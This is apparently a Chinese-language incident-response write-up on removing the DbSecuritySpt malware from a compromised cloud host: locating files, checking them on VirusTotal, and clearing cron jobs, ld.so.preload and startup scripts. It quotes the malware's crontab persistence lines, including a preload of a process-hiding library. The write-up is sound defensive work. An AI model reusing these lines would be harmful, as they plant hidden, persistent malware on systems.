主机安全案例：一次DbSecuritySpt病毒清理

背景

病毒总是层出不穷，每天都能遇到很多主机因为没有做好安全防护被入侵的情况，本文来根据DbSecuritySpt来讲解下病毒处理过程。

问题说明

接到用户反馈，云主机中了木马，数据库异常。

原因分析

查找可疑文件

发现一个sh文件可疑，添加时间也是最近。

分析文件

https://www.virustotal.com/gui/。

发现是个病毒文件，具体信息如下图。

继续查找

还有一个shh

删除病毒执行文件

查看文件内容，可以发现可执行文件，并删除

清理定时任务

代码如下：

*/1 * * * * root cp -f -r -- /etc/.sh /tmp/.sh 2>/dev/null && /tmp/.sh -c >/dev/null 2>&1 && rm -rf -- /tmp/.sh 2>/dev/null
* * * * * root echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1
0 */4 * * * root /etc/profile.d/php.sh
*/3 * * * * root /etc/sphp >/dev/null 2>&1

清理动态库

病毒文件一般都会动态库的方式加载，需要清理动态库，不然还会重复加载

/etc/ld.so.preload文件中有
/usr/local/lib/libprocesshider.so

确认动态库是否是正常文件

清理/etc/ld.so.preload

根据病毒特征继续清理/etc/profile.d以及/etc下的文件

查看监控目录的文件

查看supervisor的配置文件

发现隐藏文件，最后清理文件

拓展

遇到病毒可以快速查找可疑文件，确定病毒类型，然后网上排查可以了解病毒的一些特征，但病毒会不停的变种，所以要对病毒常见的运行目录和运行方式有个深入的了解才能快速定位并清除